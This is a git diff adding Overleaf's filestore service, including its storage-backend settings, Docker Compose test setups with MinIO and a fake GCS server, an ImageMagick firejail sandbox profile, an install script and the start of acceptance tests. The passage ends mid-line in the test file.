+--env-add=ENABLE_CONVERSIONS="true",USE_PROM_METRICS="true",AWS_S3_USER_FILES_STORAGE_CLASS=REDUCED_REDUNDANCY,AWS_S3_USER_FILES_BUCKET_NAME=fake-user-files,AWS_S3_USER_FILES_DEK_BUCKET_NAME=fake-user-files-dek,AWS_S3_TEMPLATE_FILES_BUCKET_NAME=fake-template-files,GCS_USER_FILES_BUCKET_NAME=fake-gcs-user-files,GCS_TEMPLATE_FILES_BUCKET_NAME=fake-gcs-template-files +--env-pass-through= +--esmock-loader=False +--node-version=20.18.2 +--public-repo=True +--script-version=4.7.0 +--test-acceptance-shards=SHARD_01_,SHARD_02_,SHARD_03_ +--use-large-ci-runner=True diff --git a/services/filestore/config/settings.defaults.js b/services/filestore/config/settings.defaults.js new file mode 100644 index 0000000..9a08bb1 --- /dev/null +++ 
b/services/filestore/config/settings.defaults.js @@ -0,0 +1,120 @@ +const Path = require('node:path') + +// environment variables renamed for consistency +// use AWS_ACCESS_KEY_ID-style going forward +if (process.env.AWS_KEY && !process.env.AWS_ACCESS_KEY_ID) { + process.env.AWS_ACCESS_KEY_ID = process.env.AWS_KEY +} +if (process.env.AWS_SECRET && !process.env.AWS_SECRET_ACCESS_KEY) { + process.env.AWS_SECRET_ACCESS_KEY = process.env.AWS_SECRET +} + +// pre-backend setting, fall back to old behaviour +if (process.env.BACKEND == null) { + if (process.env.AWS_ACCESS_KEY_ID || process.env.S3_BUCKET_CREDENTIALS) { + process.env.BACKEND = 's3' + process.env.USER_FILES_BUCKET_NAME = + process.env.AWS_S3_USER_FILES_BUCKET_NAME + process.env.TEMPLATE_FILES_BUCKET_NAME = + process.env.AWS_S3_TEMPLATE_FILES_BUCKET_NAME + } else { + process.env.BACKEND = 'fs' + process.env.USER_FILES_BUCKET_NAME = Path.join(__dirname, '../user_files') + process.env.TEMPLATE_FILES_BUCKET_NAME = Path.join( + __dirname, + '../template_files' + ) + } +} + +const settings = { + internal: { + filestore: { + port: 3009, + host: process.env.LISTEN_ADDRESS || '127.0.0.1', + }, + }, + + filestore: { + // Which backend persistor to use. + // Choices are + // s3 - Amazon S3 + // fs - local filesystem + // gcs - Google Cloud Storage + backend: process.env.BACKEND, + + gcs: { + endpoint: process.env.GCS_API_ENDPOINT + ? { + apiEndpoint: process.env.GCS_API_ENDPOINT, + projectId: process.env.GCS_PROJECT_ID, + } + : undefined, + unlockBeforeDelete: process.env.GCS_UNLOCK_BEFORE_DELETE === 'true', // unlock an event-based hold before deleting. default false + deletedBucketSuffix: process.env.GCS_DELETED_BUCKET_SUFFIX, // if present, copy file to another bucket on delete. default null + deleteConcurrency: parseInt(process.env.GCS_DELETE_CONCURRENCY) || 50, + signedUrlExpiryInMs: parseInt(process.env.LINK_EXPIRY_TIMEOUT || 60000), + }, + + s3: { + key: process.env.AWS_ACCESS_KEY_ID, + secret: process.env.AWS_SECRET_ACCESS_KEY, + endpoint: process.env.AWS_S3_ENDPOINT, + pathStyle: process.env.AWS_S3_PATH_STYLE, + partSize: process.env.AWS_S3_PARTSIZE || 100 * 1024 * 1024, + bucketCreds: process.env.S3_BUCKET_CREDENTIALS + ? JSON.parse(process.env.S3_BUCKET_CREDENTIALS) + : undefined, + }, + + // GCS should be configured by the service account on the kubernetes pod. See GOOGLE_APPLICATION_CREDENTIALS, + // which will be picked up automatically. + + stores: { + user_files: process.env.USER_FILES_BUCKET_NAME, + template_files: process.env.TEMPLATE_FILES_BUCKET_NAME, + + // allow signed links to be generated for these buckets + project_blobs: process.env.OVERLEAF_EDITOR_PROJECT_BLOBS_BUCKET, + global_blobs: process.env.OVERLEAF_EDITOR_BLOBS_BUCKET, + }, + + fallback: process.env.FALLBACK_BACKEND + ? { + backend: process.env.FALLBACK_BACKEND, + // mapping of bucket names on the fallback, to bucket names on the primary. + // e.g. 
{ myS3UserFilesBucketName: 'myGoogleUserFilesBucketName' } + buckets: JSON.parse(process.env.FALLBACK_BUCKET_MAPPING || '{}'), + copyOnMiss: process.env.COPY_ON_MISS === 'true', + } + : undefined, + + allowRedirects: process.env.ALLOW_REDIRECTS === 'true', + }, + + path: { + uploadFolder: Path.join(__dirname, '../uploads'), + }, + + commands: { + // Any commands to wrap the convert utility in, for example ["nice"], or ["firejail", "--profile=/etc/firejail/convert.profile"] + convertCommandPrefix: [], + }, + + enableConversions: process.env.ENABLE_CONVERSIONS === 'true', + + gracefulShutdownDelayInMs: + parseInt(process.env.GRACEFUL_SHUTDOWN_DELAY_SECONDS ?? '30', 10) * 1000, +} + +// Filestore health check +// ---------------------- +// Project and file details to check in persistor when calling /health_check +if (process.env.HEALTH_CHECK_PROJECT_ID && process.env.HEALTH_CHECK_FILE_ID) { + settings.health_check = { + project_id: process.env.HEALTH_CHECK_PROJECT_ID, + file_id: process.env.HEALTH_CHECK_FILE_ID, + } +} + +module.exports = settings diff --git a/services/filestore/docker-compose.ci.yml b/services/filestore/docker-compose.ci.yml new file mode 100644 index 0000000..febd6e4 --- /dev/null +++ b/services/filestore/docker-compose.ci.yml @@ -0,0 +1,203 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + user: node + command: npm run test:unit:_run + environment: + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + + + test_acceptance: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + AWS_S3_ENDPOINT: https://minio:9000 + AWS_S3_PATH_STYLE: 'true' + AWS_ACCESS_KEY_ID: OVERLEAF_FILESTORE_S3_ACCESS_KEY_ID + AWS_SECRET_ACCESS_KEY: OVERLEAF_FILESTORE_S3_SECRET_ACCESS_KEY + MINIO_ROOT_USER: MINIO_ROOT_USER + MINIO_ROOT_PASSWORD: MINIO_ROOT_PASSWORD + GCS_API_ENDPOINT: http://gcs:9090 + GCS_PROJECT_ID: fake + STORAGE_EMULATOR_HOST: http://gcs:9090/storage/v1 + MOCHA_GREP: ${MOCHA_GREP} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + ENABLE_CONVERSIONS: "true" + USE_PROM_METRICS: "true" + AWS_S3_USER_FILES_STORAGE_CLASS: REDUCED_REDUNDANCY + AWS_S3_USER_FILES_BUCKET_NAME: fake-user-files + AWS_S3_USER_FILES_DEK_BUCKET_NAME: fake-user-files-dek + AWS_S3_TEMPLATE_FILES_BUCKET_NAME: fake-template-files + GCS_USER_FILES_BUCKET_NAME: fake-gcs-user-files + GCS_TEMPLATE_FILES_BUCKET_NAME: fake-gcs-template-files + volumes: + - ./test/acceptance/certs:/certs + depends_on: + certs: + condition: service_completed_successfully + minio: + condition: service_started + minio_setup: + condition: service_completed_successfully + gcs: + condition: service_healthy + user: node + command: npm run test:acceptance + + + tar: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + volumes: + - ./:/tmp/build/ + command: tar -czf /tmp/build/build.tar.gz --exclude=build.tar.gz --exclude-vcs . + user: root + certs: + image: node:20.18.2 + volumes: + - ./test/acceptance/certs:/certs + working_dir: /certs + entrypoint: sh + command: + - '-cex' + - | + if [ ! -f ./certgen ]; then + wget -O ./certgen "https://github.com/minio/certgen/releases/download/v1.3.0/certgen-linux-$(dpkg --print-architecture)" + chmod +x ./certgen + fi + if [ ! -f private.key ] || [ ! 
-f public.crt ]; then + ./certgen -host minio + fi + + minio: + image: minio/minio:RELEASE.2024-10-13T13-34-11Z + command: server /data + volumes: + - ./test/acceptance/certs:/root/.minio/certs + environment: + MINIO_ROOT_USER: MINIO_ROOT_USER + MINIO_ROOT_PASSWORD: MINIO_ROOT_PASSWORD + depends_on: + certs: + condition: service_completed_successfully + + minio_setup: + depends_on: + certs: + condition: service_completed_successfully + minio: + condition: service_started + image: minio/mc:RELEASE.2024-10-08T09-37-26Z + volumes: + - ./test/acceptance/certs:/root/.mc/certs/CAs + entrypoint: sh + command: + - '-cex' + - | + sleep 1 + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \ + || sleep 3 && \ + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \ + || sleep 3 && \ + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \ + || sleep 3 && \ + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD + mc mb --ignore-existing s3/fake-user-files + mc mb --ignore-existing s3/fake-user-files-dek + mc mb --ignore-existing s3/fake-template-files + mc admin user add s3 \ + OVERLEAF_FILESTORE_S3_ACCESS_KEY_ID \ + OVERLEAF_FILESTORE_S3_SECRET_ACCESS_KEY + + echo ' + { + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::fake-user-files" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::fake-user-files/*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::fake-user-files-dek" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::fake-user-files-dek/*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::fake-template-files" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::fake-template-files/*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::random-bucket-*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::random-bucket-*" + } + ] + }' > policy-filestore.json + + mc admin policy create s3 overleaf-filestore policy-filestore.json + mc admin policy attach s3 overleaf-filestore \ + --user=OVERLEAF_FILESTORE_S3_ACCESS_KEY_ID + gcs: + image: fsouza/fake-gcs-server:1.45.2 + command: ["--port=9090", "--scheme=http"] + healthcheck: + test: wget --quiet --output-document=/dev/null http://localhost:9090/storage/v1/b + interval: 1s + retries: 20 diff --git a/services/filestore/docker-compose.yml b/services/filestore/docker-compose.yml new file mode 100644 index 0000000..cc58997 --- /dev/null +++ b/services/filestore/docker-compose.yml @@ -0,0 +1,211 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + build: + context: ../.. 
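+ # note: the build context is the monorepo root (../..) rather than this
+ # service's directory, so the image build can reach the shared libraries/
+ # and node_modules/ trees that are also bind-mounted below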
+ dockerfile: services/filestore/Dockerfile + target: base + volumes: + - .:/overleaf/services/filestore + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/filestore + environment: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit + user: node + + test_acceptance: + build: + context: ../.. + dockerfile: services/filestore/Dockerfile + target: base + volumes: + - .:/overleaf/services/filestore + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + - ./test/acceptance/certs:/certs + working_dir: /overleaf/services/filestore + environment: + ELASTIC_SEARCH_DSN: es:9200 + MONGO_HOST: mongo + POSTGRES_HOST: postgres + AWS_S3_ENDPOINT: https://minio:9000 + AWS_S3_PATH_STYLE: 'true' + AWS_ACCESS_KEY_ID: OVERLEAF_FILESTORE_S3_ACCESS_KEY_ID + AWS_SECRET_ACCESS_KEY: OVERLEAF_FILESTORE_S3_SECRET_ACCESS_KEY + MINIO_ROOT_USER: MINIO_ROOT_USER + MINIO_ROOT_PASSWORD: MINIO_ROOT_PASSWORD + GCS_API_ENDPOINT: http://gcs:9090 + GCS_PROJECT_ID: fake + STORAGE_EMULATOR_HOST: http://gcs:9090/storage/v1 + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + ENABLE_CONVERSIONS: "true" + USE_PROM_METRICS: "true" + AWS_S3_USER_FILES_STORAGE_CLASS: REDUCED_REDUNDANCY + AWS_S3_USER_FILES_BUCKET_NAME: fake-user-files + AWS_S3_USER_FILES_DEK_BUCKET_NAME: fake-user-files-dek + AWS_S3_TEMPLATE_FILES_BUCKET_NAME: fake-template-files + GCS_USER_FILES_BUCKET_NAME: fake-gcs-user-files + GCS_TEMPLATE_FILES_BUCKET_NAME: fake-gcs-template-files + user: node + depends_on: + certs: + condition: service_completed_successfully + minio: + condition: service_started + minio_setup: + condition: service_completed_successfully + gcs: + condition: service_healthy + command: npm run --silent test:acceptance + + certs: + image: node:20.18.2 + volumes: + - ./test/acceptance/certs:/certs + working_dir: /certs + entrypoint: sh + command: + - '-cex' + - | + if [ ! -f ./certgen ]; then + wget -O ./certgen "https://github.com/minio/certgen/releases/download/v1.3.0/certgen-linux-$(dpkg --print-architecture)" + chmod +x ./certgen + fi + if [ ! -f private.key ] || [ ! 
-f public.crt ]; then + ./certgen -host minio + fi + + minio: + image: minio/minio:RELEASE.2024-10-13T13-34-11Z + command: server /data + volumes: + - ./test/acceptance/certs:/root/.minio/certs + environment: + MINIO_ROOT_USER: MINIO_ROOT_USER + MINIO_ROOT_PASSWORD: MINIO_ROOT_PASSWORD + depends_on: + certs: + condition: service_completed_successfully + + minio_setup: + depends_on: + certs: + condition: service_completed_successfully + minio: + condition: service_started + image: minio/mc:RELEASE.2024-10-08T09-37-26Z + volumes: + - ./test/acceptance/certs:/root/.mc/certs/CAs + entrypoint: sh + command: + - '-cex' + - | + sleep 1 + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \ + || sleep 3 && \ + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \ + || sleep 3 && \ + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD \ + || sleep 3 && \ + mc alias set s3 https://minio:9000 MINIO_ROOT_USER MINIO_ROOT_PASSWORD + mc mb --ignore-existing s3/fake-user-files + mc mb --ignore-existing s3/fake-user-files-dek + mc mb --ignore-existing s3/fake-template-files + mc admin user add s3 \ + OVERLEAF_FILESTORE_S3_ACCESS_KEY_ID \ + OVERLEAF_FILESTORE_S3_SECRET_ACCESS_KEY + + echo ' + { + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::fake-user-files" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::fake-user-files/*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::fake-user-files-dek" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::fake-user-files-dek/*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::fake-template-files" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::fake-template-files/*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:ListBucket" + ], + "Resource": "arn:aws:s3:::random-bucket-*" + }, + { + "Effect": "Allow", + "Action": [ + "s3:PutObject", + "s3:GetObject", + "s3:DeleteObject" + ], + "Resource": "arn:aws:s3:::random-bucket-*" + } + ] + }' > policy-filestore.json + + mc admin policy create s3 overleaf-filestore policy-filestore.json + mc admin policy attach s3 overleaf-filestore \ + --user=OVERLEAF_FILESTORE_S3_ACCESS_KEY_ID + gcs: + image: fsouza/fake-gcs-server:1.45.2 + command: ["--port=9090", "--scheme=http"] + healthcheck: + test: wget --quiet --output-document=/dev/null http://localhost:9090/storage/v1/b + interval: 1s + retries: 20 diff --git a/services/filestore/firejail/convert.profile b/services/filestore/firejail/convert.profile new file mode 100644 index 0000000..38cc1a2 --- /dev/null +++ b/services/filestore/firejail/convert.profile @@ -0,0 +1,40 @@ +# Convert (ImageMagick profile) + +include /etc/firejail/disable-common.inc +include /etc/firejail/disable-devel.inc +# include /etc/firejail/disable-mgmt.inc ## removed in firejail 0.9.40 +# include /etc/firejail/disable-secret.inc ## removed in firejail 0.9.40 + +read-only /bin +blacklist /boot +blacklist /dev +read-only /etc +read-only /home +read-only /lib +read-only /lib64 +blacklist /media +blacklist /mnt +blacklist /opt +blacklist /root +read-only /run +blacklist /sbin +blacklist /selinux +blacklist /src +blacklist /sys 
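+# /usr is left readable below so the convert binary and its libraries can
+# still be loaded; every other mount point not needed at runtime is
+# blacklisted outright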
+read-only /usr +blacklist /var + +caps.drop all +noroot +nogroups +protocol unix +net none +private-tmp +private-dev +shell none + +seccomp.keep accept,accept4,access,alarm,arch_prctl,bind,brk,capget,capset,chdir,chmod,chown,chroot,clock_getres,clock_gettime,clock_nanosleep,clone,close,connect,creat,dup,dup2,dup3,epoll_create,epoll_create1,epoll_ctl,epoll_ctl_old,epoll_pwait,epoll_wait,epoll_wait_old,eventfd,eventfd2,execve,execveat,exit,exit_group,faccessat,fadvise64,fallocate,fanotify_init,fanotify_mark,fchdir,fchmod,fchmodat,fchown,fchownat,fcntl,fdatasync,fgetxattr,flistxattr,flock,fork,fremovexattr,fsetxattr,fstat,fstatfs,fsync,ftruncate,futex,futimesat,get_robust_list,get_thread_area,getcpu,getcwd,getdents,getdents64,getegid,geteuid,getgid,getgroups,getitimer,getpeername,getpgid,getpgrp,getpid,getppid,getpriority,getrandom,getresgid,getresuid,getrlimit,getrusage,getsid,getsockname,getsockopt,gettid,gettimeofday,getuid,getxattr,inotify_add_watch,inotify_init,inotify_init1,inotify_rm_watch,io_cancel,io_destroy,io_getevents,io_setup,io_submit,ioctl,ioprio_get,ioprio_set,kill,lchown,lgetxattr,link,linkat,listen,listxattr,llistxattr,lremovexattr,lseek,lsetxattr,lstat,madvise,memfd_create,mincore,mkdir,mkdirat,mknod,mknodat,mlock,mlockall,mmap,modify_ldt,mprotect,mq_getsetattr,mq_notify,mq_open,mq_timedreceive,mq_timedsend,mq_unlink,mremap,msgctl,msgget,msgrcv,msgsnd,msync,munlock,munlockall,munmap,nanosleep,newfstatat,open,openat,pause,personality,pipe,pipe2,poll,ppoll,prctl,pread64,preadv,prlimit64,pselect6,pwrite64,pwritev,read,readahead,readlink,readlinkat,readv,recvfrom,recvmmsg,recvmsg,remap_file_pages,removexattr,rename,renameat,renameat2,restart_syscall,rmdir,rt_sigaction,rt_sigpending,rt_sigprocmask,rt_sigqueueinfo,rt_sigreturn,rt_sigsuspend,rt_sigtimedwait,rt_tgsigqueueinfo,sched_get_priority_max,sched_get_priority_min,sched_getaffinity,sched_getattr,sched_getparam,sched_getscheduler,sched_rr_get_interval,sched_setaffinity,sched_setattr,sched_setparam,sched_setscheduler,sched_yield,seccomp,select,semctl,semget,semop,semtimedop,sendfile,sendmmsg,sendmsg,sendto,set_robust_list,set_thread_area,set_tid_address,setdomainname,setfsgid,setfsuid,setgid,setgroups,sethostname,setitimer,setpgid,setpriority,setregid,setresgid,setresuid,setreuid,setrlimit,setsid,setsockopt,setuid,setxattr,shmat,shmctl,shmdt,shmget,shutdown,sigaltstack,signalfd,signalfd4,socket,socketpair,splice,stat,statfs,symlink,symlinkat,sync,sync_file_range,syncfs,sysinfo,syslog,tee,tgkill,time,timer_create,timer_delete,timer_getoverrun,timer_gettime,timer_settime,timerfd_create,timerfd_gettime,timerfd_settime,times,tkill,truncate,umask,uname,unlink,unlinkat,utime,utimensat,utimes,vfork,vhangup,vmsplice,wait4,waitid,write,writev,unshare + +rlimit-fsize 524288000 #500Mb +rlimit-nproc 600 #if too low this can cause error: Error fork:sandbox(774): Resource temporarily unavailable +rlimit-nofile 100 \ No newline at end of file diff --git a/services/filestore/install_deps.sh b/services/filestore/install_deps.sh new file mode 100755 index 0000000..1335e9f --- /dev/null +++ b/services/filestore/install_deps.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +set -ex + +apt-get update + +apt-get install ghostscript imagemagick optipng iproute2 --yes + +rm -rf /var/lib/apt/lists/* + +# Allow ImageMagick to process PDF files. Filestore does pdf to image +# conversion for the templates service. 
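+# The stock policy.xml ships with the PDF coder disabled, which is the one
+# line the patch below removes. After patching, a conversion along these
+# lines should succeed (file names here are purely illustrative):
+#   convert -density 72 example.pdf example.png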
+patch /etc/ImageMagick-6/policy.xml <<EOF +--- old.xml 2022-03-23 09:16:03.985433900 -0400 ++++ new.xml 2022-03-23 09:16:18.625471992 -0400 +@@ -91,6 +91,5 @@ + <policy domain="coder" rights="none" pattern="PS2" /> + <policy domain="coder" rights="none" pattern="PS3" /> + <policy domain="coder" rights="none" pattern="EPS" /> +- <policy domain="coder" rights="none" pattern="PDF" /> + <policy domain="coder" rights="none" pattern="XPS" /> + </policymap> +EOF diff --git a/services/filestore/package.json b/services/filestore/package.json new file mode 100644 index 0000000..4b9043a --- /dev/null +++ b/services/filestore/package.json @@ -0,0 +1,49 @@ +{ + "name": "@overleaf/filestore", + "description": "An API for CRUD operations on binary files stored in S3", + "private": true, + "main": "app.js", + "scripts": { + "test:acceptance:run": "mocha --recursive --reporter spec --timeout 15000 $@ test/acceptance/js", + "test:acceptance": "npm run test:acceptance:_run -- --grep=$MOCHA_GREP", + "test:unit:run": "mocha --recursive --reporter spec $@ test/unit/js", + "test:unit": "npm run test:unit:_run -- --grep=$MOCHA_GREP", + "start": "node app.js", + "nodemon": "node --watch app.js", + "lint": "eslint --max-warnings 0 --format unix .", + "format": "prettier --list-different $PWD/'**/*.*js'", + "format:fix": "prettier --write $PWD/'**/*.*js'", + "test:acceptance:_run": "mocha --recursive --reporter spec --timeout 15000 --exit $@ test/acceptance/js", + "test:unit:_run": "mocha --recursive --reporter spec $@ test/unit/js", + "lint:fix": "eslint --fix .", + "types:check": "tsc --noEmit" + }, + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/object-persistor": "*", + "@overleaf/settings": "*", + "@overleaf/stream-utils": "^0.1.0", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "express": "^4.21.2", + "glob": "^7.1.6", + "lodash.once": "^4.1.1", + "node-fetch": "^2.7.0", + "range-parser": "^1.2.1", + "tiny-async-pool": "^1.1.0" + }, + "devDependencies": { + "@google-cloud/storage": "^6.10.1", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "mongodb": "6.12.0", + "sandboxed-module": "2.0.4", + "sinon": "9.0.2", + "sinon-chai": "^3.7.0", + "streamifier": "^0.1.1", + "typescript": "^5.0.4" + } +} diff --git a/services/filestore/test/acceptance/certs/.gitignore b/services/filestore/test/acceptance/certs/.gitignore new file mode 100644 index 0000000..d6b7ef3 --- /dev/null +++ b/services/filestore/test/acceptance/certs/.gitignore @@ -0,0 +1,2 @@ +* +!.gitignore diff --git a/services/filestore/test/acceptance/deps/Dockerfile.fake-gcs b/services/filestore/test/acceptance/deps/Dockerfile.fake-gcs new file mode 100644 index 0000000..d39a293 --- /dev/null +++ b/services/filestore/test/acceptance/deps/Dockerfile.fake-gcs @@ -0,0 +1,5 @@ +FROM fsouza/fake-gcs-server:1.20 +RUN apk add --update --no-cache curl +COPY healthcheck.sh /healthcheck.sh +HEALTHCHECK --interval=1s --timeout=1s --retries=30 CMD /healthcheck.sh http://127.0.0.1:9090 +CMD ["--port=9090", "--scheme=http"] diff --git a/services/filestore/test/acceptance/deps/Dockerfile.s3mock b/services/filestore/test/acceptance/deps/Dockerfile.s3mock new file mode 100644 index 0000000..8b033fa --- /dev/null +++ b/services/filestore/test/acceptance/deps/Dockerfile.s3mock @@ -0,0 +1,4 @@ +FROM adobe/s3mock:2.4.14 +RUN apk add --update --no-cache curl +COPY healthcheck.sh /healthcheck.sh +HEALTHCHECK --interval=1s --timeout=1s --retries=30 CMD /healthcheck.sh 
http://127.0.0.1:9090 diff --git a/services/filestore/test/acceptance/deps/healthcheck.sh b/services/filestore/test/acceptance/deps/healthcheck.sh new file mode 100755 index 0000000..675c205 --- /dev/null +++ b/services/filestore/test/acceptance/deps/healthcheck.sh @@ -0,0 +1,9 @@ +#!/bin/sh + +# health check to allow 404 status code as valid +STATUSCODE=$(curl --silent --output /dev/null --write-out "%{http_code}" "$1") +# will be 000 on non-http error (e.g. connection failure) +if test "$STATUSCODE" -ge 500 || test "$STATUSCODE" -lt 200; then + exit 1 +fi +exit 0 diff --git a/services/filestore/test/acceptance/js/FilestoreApp.js b/services/filestore/test/acceptance/js/FilestoreApp.js new file mode 100644 index 0000000..61e9a29 --- /dev/null +++ b/services/filestore/test/acceptance/js/FilestoreApp.js @@ -0,0 +1,42 @@ +const ObjectPersistor = require('@overleaf/object-persistor') +const Settings = require('@overleaf/settings') +const { promisify } = require('node:util') +const App = require('../../../app') +const FileHandler = require('../../../app/js/FileHandler') + +class FilestoreApp { + async runServer() { + if (!this.server) { + await new Promise((resolve, reject) => { + this.server = App.listen( + Settings.internal.filestore.port, + '127.0.0.1', + err => { + if (err) { + return reject(err) + } + resolve() + } + ) + }) + } + + this.persistor = ObjectPersistor({ + ...Settings.filestore, + paths: Settings.path, + }) + FileHandler._TESTONLYSwapPersistorManager(this.persistor) + } + + async stop() { + if (!this.server) return + const closeServer = promisify(this.server.close).bind(this.server) + try { + await closeServer() + } finally { + delete this.server + } + } +} + +module.exports = FilestoreApp diff --git a/services/filestore/test/acceptance/js/FilestoreTests.js b/services/filestore/test/acceptance/js/FilestoreTests.js new file mode 100644 index 0000000..28f90d4 --- /dev/null +++ b/services/filestore/test/acceptance/js/FilestoreTests.js @@ -0,0 +1,1564 @@ +const chai = require('chai') +const { expect } = chai +const fs = require('node:fs') +const Stream = require('node:stream') +const Settings = require('@overleaf/settings') +const Path = require('node:path') +const FilestoreApp = require('./FilestoreApp') +const TestHelper = require('./TestHelper') +const fetch = require('node-fetch') +const { promisify } = require('node:util') +const { Storage } = require('@google-cloud/storage') +const streamifier = require('streamifier') +chai.use(require('chai-as-promised')) +const { ObjectId } = require('mongodb') +const ChildProcess = require('node:child_process') + +const fsWriteFile = promisify(fs.writeFile) +const fsStat = promisify(fs.stat) +const exec = promisify(ChildProcess.exec) +const msleep = promisify(setTimeout) + +if (!process.env.AWS_ACCESS_KEY_ID) { + throw new Error('please provide credentials for the AWS S3 test server') +} + +process.on('unhandledRejection', e => { + // eslint-disable-next-line no-console + console.log('** Unhandled Promise Rejection **\n', e) + throw e +}) + +// store settings for multiple backends, so that we can test each one. 
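+// (each entry in BackendSettings re-runs the whole Filestore describe block
+// below, so the same tests cover every configured backend)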
+// fs will always be available - add others if they are configured +const { + BackendSettings, + s3Config, + s3SSECConfig, + AWS_S3_USER_FILES_STORAGE_CLASS, +} = require('./TestConfig') +const { + AlreadyWrittenError, + NotFoundError, + NotImplementedError, + NoKEKMatchedError, +} = require('@overleaf/object-persistor/src/Errors') +const { + PerProjectEncryptedS3Persistor, + RootKeyEncryptionKey, +} = require('@overleaf/object-persistor/src/PerProjectEncryptedS3Persistor') +const { S3Persistor } = require('@overleaf/object-persistor/src/S3Persistor') +const crypto = require('node:crypto') +const { WritableBuffer } = require('@overleaf/stream-utils') +const { gzipSync } = require('node:zlib') + +describe('Filestore', function () { + this.timeout(1000 * 10) + const filestoreUrl = `http://127.0.0.1:${Settings.internal.filestore.port}` + + const seenSockets = [] + async function expectNoSockets() { + try { + await msleep(1000) + const { stdout } = await exec('ss -tn') + const lines = stdout.split('\n') + const header = lines.shift() + + const badSockets = [] + for (const socket of lines) { + const fields = socket.split(' ').filter(part => part !== '') + if ( + fields.length > 2 && + parseInt(fields[1]) && + !seenSockets.includes(socket) + ) { + badSockets.push(socket) + seenSockets.push(socket) + } + } + + if (badSockets.length) { + // eslint-disable-next-line no-console + console.error( + 'ERR: Sockets still have receive buffer after connection closed' + ) + console.error(header) + for (const socket of badSockets) { + // eslint-disable-next-line no-console + console.error(socket) + } + throw new Error('Sockets still open after connection closed') + } + } catch (err) { + expect(err).not.to.exist + } + } + + // redefine the test suite for every available backend + for (const [backendVariantWithShardNumber, backendSettings] of Object.entries( + BackendSettings + )) { + describe(backendVariantWithShardNumber, function () { + let app, + previousEgress, + previousIngress, + metricPrefix, + projectId, + otherProjectId + + const dataEncryptionKeySize = + backendSettings.backend === 's3SSEC' ? 
